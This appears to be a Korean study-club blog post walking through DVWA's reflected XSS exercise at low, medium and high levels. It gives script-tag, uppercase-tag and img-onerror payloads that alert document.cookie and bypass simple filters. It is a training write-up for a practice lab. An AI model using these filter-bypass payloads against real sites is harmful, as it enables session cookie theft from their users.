DVWA 실습
XSS (Reflected)
low
name값으로 스크립트를 바로 넣어준다
<script>alert(document.cookie)</script>
medium
이전 단계의 스크립트는 막힘
소스코드를 보면 <script>를 막고 있음
<SCRIPT>로 사용
<SCRIPT>alert(document.cookie)</script>
high
이전 단계에서 사용한 스크립트는 막힘
script 태그를 공백으로 바꿔버림
→ 이미지 태그를 쓰자
<img src="1" onerror="alert(document.cookie)">
728x90
'동아리 > 팀 스터디' 카테고리의 다른 글
| [9기 심화] 웹 취약점 분석 11 (0) | 2024.05.01 |
|---|---|
| [9기 심화] 웹 취약점 분석 10 (0) | 2024.03.28 |
| [9기 심화] 웹 취약점 분석 08 (0) | 2024.03.28 |
| [9기 심화] 웹 취약점 분석 07 (0) | 2024.03.28 |
| [9기 심화] 웹 취약점 분석 06 (0) | 2024.03.22 |